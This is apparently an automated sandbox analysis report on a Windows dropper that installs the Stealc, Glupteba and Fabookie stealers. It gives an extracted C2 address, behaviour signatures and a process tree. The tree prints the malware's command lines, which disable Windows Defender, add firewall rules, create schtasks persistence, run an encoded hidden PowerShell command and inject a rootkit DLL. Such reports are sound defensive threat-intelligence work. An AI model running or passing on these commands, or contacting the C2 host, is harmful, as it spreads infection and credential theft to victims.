Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-01-2024 23:33

General

  • Target

    48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe

  • Size

    5.0MB

  • MD5

    f181b08d7d06f955a53a2593b3596991

  • SHA1

    c2af74c384c68491121799a8d89b5cd4322c41b2

  • SHA256

    48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11

  • SHA512

    5784992d21762b523176b3a35e5611916568366fc3abf06cff54c6c1a2b77792f5a50f040facc4b3c786edc31d71b1a41d26a3708483289b3867e949fd515731

  • SSDEEP

    49152:lhUCgfFMiW4UnAnkOh9pjA7E9HgFRJ9Tp4mMeJmjMjK0JlUJkGf3yIGul:s9AdHBJmg1wJkGZl

Malware Config

Extracted

Family

stealc

C2

http://185.172.128.79

Attributes
  • url_path

    /3886d2276f6914c4.php

rc4.plain

Signatures

  • Detect Fabookie payload 2 IoCs
  • Fabookie

    Fabookie is facebook account info stealer.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • UAC bypass 3 TTPs 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 1 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 9 IoCs
  • Executes dropped EXE 26 IoCs
  • Loads dropped DLL 12 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 12 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 25 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 6 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 8 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe
    "C:\Users\Admin\AppData\Local\Temp\48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe"
    1⤵
    • UAC bypass
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:1460
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe" -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4908
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
      2⤵
      • Drops startup file
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5076
      • C:\Users\Admin\Pictures\J8MZqzY86iIMzzByraYnKAlH.exe
        "C:\Users\Admin\Pictures\J8MZqzY86iIMzzByraYnKAlH.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2044
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5228
        • C:\Users\Admin\Pictures\J8MZqzY86iIMzzByraYnKAlH.exe
          "C:\Users\Admin\Pictures\J8MZqzY86iIMzzByraYnKAlH.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Checks for VirtualBox DLLs, possible anti-VM trick
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          PID:5188
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            5⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4292
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            5⤵
              PID:2416
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:456
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1500
        • C:\Users\Admin\Pictures\KVNZSaD28HGP82BSu04KxHiU.exe
          "C:\Users\Admin\Pictures\KVNZSaD28HGP82BSu04KxHiU.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1820
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5308
          • C:\Users\Admin\Pictures\KVNZSaD28HGP82BSu04KxHiU.exe
            "C:\Users\Admin\Pictures\KVNZSaD28HGP82BSu04KxHiU.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Checks for VirtualBox DLLs, possible anti-VM trick
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:4524
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5332
            • C:\Windows\system32\cmd.exe
              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              5⤵
                PID:1684
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                5⤵
                • Blocklisted process makes network request
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5256
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                5⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4452
              • C:\Windows\rss\csrss.exe
                C:\Windows\rss\csrss.exe
                5⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Manipulates WinMonFS driver.
                • Drops file in Windows directory
                • Suspicious use of AdjustPrivilegeToken
                PID:4940
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  6⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1012
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  6⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5488
                • C:\Windows\SYSTEM32\schtasks.exe
                  schtasks /delete /tn ScheduledUpdate /f
                  6⤵
                    PID:5564
                  • C:\Windows\SYSTEM32\schtasks.exe
                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                    6⤵
                    • Creates scheduled task(s)
                    PID:4648
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    6⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5860
                  • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                    6⤵
                    • Executes dropped EXE
                    PID:5284
                  • C:\Windows\SYSTEM32\schtasks.exe
                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                    6⤵
                    • Creates scheduled task(s)
                    PID:3624
                  • C:\Windows\windefender.exe
                    "C:\Windows\windefender.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:5940
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                      7⤵
                        PID:5660
                        • C:\Windows\SysWOW64\sc.exe
                          sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                          8⤵
                          • Launches sc.exe
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1176
              • C:\Users\Admin\Pictures\97Jy8NUogrY6pXmCGwHvApBM.exe
                "C:\Users\Admin\Pictures\97Jy8NUogrY6pXmCGwHvApBM.exe"
                3⤵
                • Executes dropped EXE
                PID:4632
              • C:\Users\Admin\Pictures\riNVBxveUPQ1dduMvr5TXg7i.exe
                "C:\Users\Admin\Pictures\riNVBxveUPQ1dduMvr5TXg7i.exe"
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:4044
                • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                  C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:2144
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2736
                    • C:\Windows\SysWOW64\chcp.com
                      chcp 1251
                      6⤵
                        PID:3320
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                        6⤵
                        • Creates scheduled task(s)
                        PID:3588
                  • C:\Users\Admin\AppData\Local\Temp\nsn5AA5.tmp
                    C:\Users\Admin\AppData\Local\Temp\nsn5AA5.tmp
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4192
                • C:\Users\Admin\Pictures\ZxIyRlydDx0u0UehgXz9WXlL.exe
                  "C:\Users\Admin\Pictures\ZxIyRlydDx0u0UehgXz9WXlL.exe"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:2664
                  • C:\Users\Admin\AppData\Local\Temp\7zS5E1E.tmp\Install.exe
                    .\Install.exe
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:4512
                    • C:\Users\Admin\AppData\Local\Temp\7zS6179.tmp\Install.exe
                      .\Install.exe /tSUWodidgk "385118" /S
                      5⤵
                      • Checks BIOS information in registry
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Drops file in System32 directory
                      • Enumerates system info in registry
                      • Suspicious use of WriteProcessMemory
                      PID:2900
                      • C:\Windows\SysWOW64\forfiles.exe
                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                        6⤵
                          PID:1912
                          • C:\Windows\SysWOW64\cmd.exe
                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                            7⤵
                            • Suspicious use of WriteProcessMemory
                            PID:692
                        • C:\Windows\SysWOW64\forfiles.exe
                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                          6⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4132
                          • C:\Windows\SysWOW64\cmd.exe
                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                            7⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1292
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /CREATE /TN "gezYmBTgd" /SC once /ST 17:44:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                          6⤵
                          • Creates scheduled task(s)
                          PID:2676
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /run /I /tn "gezYmBTgd"
                          6⤵
                            PID:4872
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /DELETE /F /TN "gezYmBTgd"
                            6⤵
                              PID:3968
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /CREATE /TN "bLyGxHYCYhmZEhkSec" /SC once /ST 23:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB\dRWIRjKfRjRPExc\biTSpsE.exe\" A6 /rCsite_idKeJ 385118 /S" /V1 /F
                              6⤵
                              • Drops file in Windows directory
                              • Creates scheduled task(s)
                              PID:1176
                      • C:\Users\Admin\Pictures\dzIJg2BJkMR7TCEjqOzWKHfx.exe
                        "C:\Users\Admin\Pictures\dzIJg2BJkMR7TCEjqOzWKHfx.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
                        3⤵
                        • Executes dropped EXE
                        PID:2848
                      • C:\Users\Admin\Pictures\tha95OBw3Tsn7AWPLsWEDL4y.exe
                        "C:\Users\Admin\Pictures\tha95OBw3Tsn7AWPLsWEDL4y.exe" --silent --allusers=0
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Enumerates connected drives
                        • Modifies system certificate store
                        • Suspicious use of WriteProcessMemory
                        PID:1912
                        • C:\Users\Admin\Pictures\tha95OBw3Tsn7AWPLsWEDL4y.exe
                          C:\Users\Admin\Pictures\tha95OBw3Tsn7AWPLsWEDL4y.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2cc,0x2fc,0x6f629530,0x6f62953c,0x6f629548
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:4348
                        • C:\Users\Admin\Pictures\tha95OBw3Tsn7AWPLsWEDL4y.exe
                          "C:\Users\Admin\Pictures\tha95OBw3Tsn7AWPLsWEDL4y.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1912 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240112233416" --session-guid=cd5d279a-5d60-401e-a835-066439755841 --server-tracking-blob=ZWM3NDkxMjFiZDUxYjUwNzljMDIxNDE5Mzk0ZTJmMjZlY2VmYTRmMjExYzUwMGUwM2IzZjIxNjFkMTUxOTYzYzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNTEwMjQyOC43MTAxIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIxY2FmNmI0Yy02ZTcwLTRmNjgtYjc0YS04ZmI5OGMzYzc5NDkifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7805000000000000
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Enumerates connected drives
                          PID:2140
                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\tha95OBw3Tsn7AWPLsWEDL4y.exe
                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\tha95OBw3Tsn7AWPLsWEDL4y.exe" --version
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:4320
                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122334161\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe
                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122334161\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"
                          4⤵
                          • Executes dropped EXE
                          PID:2852
                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122334161\assistant\assistant_installer.exe
                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122334161\assistant\assistant_installer.exe" --version
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:4004
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                    1⤵
                      PID:3980
                    • \??\c:\windows\SysWOW64\reg.exe
                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                      1⤵
                        PID:4724
                      • \??\c:\windows\SysWOW64\reg.exe
                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                        1⤵
                          PID:624
                        • \??\c:\windows\SysWOW64\reg.exe
                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                          1⤵
                            PID:3600
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                            1⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3568
                            • C:\Windows\system32\gpupdate.exe
                              "C:\Windows\system32\gpupdate.exe" /force
                              2⤵
                                PID:3588
                            • C:\Windows\System32\sihclient.exe
                              C:\Windows\System32\sihclient.exe /cv ZUD4K/AI40KrhQRn86ukzg.0.2
                              1⤵
                                PID:3600
                              • C:\Users\Admin\Pictures\tha95OBw3Tsn7AWPLsWEDL4y.exe
                                C:\Users\Admin\Pictures\tha95OBw3Tsn7AWPLsWEDL4y.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x2e8,0x2ec,0x2fc,0x2bc,0x300,0x6ebb9530,0x6ebb953c,0x6ebb9548
                                1⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:5160
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                1⤵
                                  PID:5480
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                  1⤵
                                    PID:5472
                                  • C:\Windows\system32\gpscript.exe
                                    gpscript.exe /RefreshSystemParam
                                    1⤵
                                      PID:5548
                                    • C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB\dRWIRjKfRjRPExc\biTSpsE.exe
                                      C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB\dRWIRjKfRjRPExc\biTSpsE.exe A6 /rCsite_idKeJ 385118 /S
                                      1⤵
                                      • Executes dropped EXE
                                      • Drops file in System32 directory
                                      PID:884
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD 